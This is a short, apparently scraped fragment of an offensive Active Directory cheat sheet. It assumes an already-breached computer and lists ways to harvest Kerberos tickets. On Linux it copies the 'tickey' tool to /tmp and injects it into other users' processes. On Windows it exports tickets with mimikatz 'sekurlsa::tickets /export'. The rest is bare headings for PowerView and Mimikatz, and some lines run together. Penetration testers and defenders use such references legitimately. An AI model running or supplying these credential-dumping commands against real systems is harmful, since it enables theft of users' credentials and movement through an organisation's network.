Active Directory
This section mean you have an access to computer that connected to AD. This mean we assume breach on that computer.
Enumerate Juicy Info
Harvest tickets from Linux
grep default_ccache_name /etc/krb5.conf# To dump current user tickets, if root, try to dump them all by injecting in other user processes
# to inject, copy tickey in a reachable folder by all users
cp tickey /tmp/tickey
/tmp/tickey -iHarvest tickets from Windows
mimikatz # sekurlsa::tickets /exportkrb5.keytab
PowerView
Import module
The Domain Users
The Domain Groups
The Shared Folder

Net Computer
Mimikatz
Last updated